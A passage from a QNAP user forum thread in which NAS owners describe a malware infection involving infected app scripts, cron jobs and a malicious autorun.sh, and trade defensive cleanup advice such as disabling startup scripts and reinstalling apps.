As an extra precaution without knowing the source or the means by which the NAS was infected. In a way that's putting the NAS, which in benzo83's case may be running SSH & UPNP backdoors and who knows what else, under quarantine.
-
somy1982
- Easy as a breeze
- Posts: 356
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
benzo83 wrote:somy1982 wrote:benzo83 wrote:dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
unfortunately i do
Check all apps under .qpkg folder - reinstall them all if you can. I found many sh scripts infected. Also the ones malware remover claimed recovered!! When exactly on 25/8 did the file created? Mine wa around 9am Europe time.
-
Mousetick
- Been there, done that
- Posts: 592
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
You do not have the required permissions to view the files attached to this post.
-
somy1982
- Easy as a breeze
- Posts: 356
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Mousetick wrote:Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
Thanks, have done that and removed the autorun.sh. Delete everything I could find and also removed all suspicious cron jobs. The NAS is restarted and the jobs are removed permanently seems.
Today I go into .qpkg folder and found many files being hacked, now I reinstalled all apps. Hopefully that's it. Otherwise I have to start from scratch
Anybody know if QNAP provide a way to completely reset QTS OS and leave data unchanged?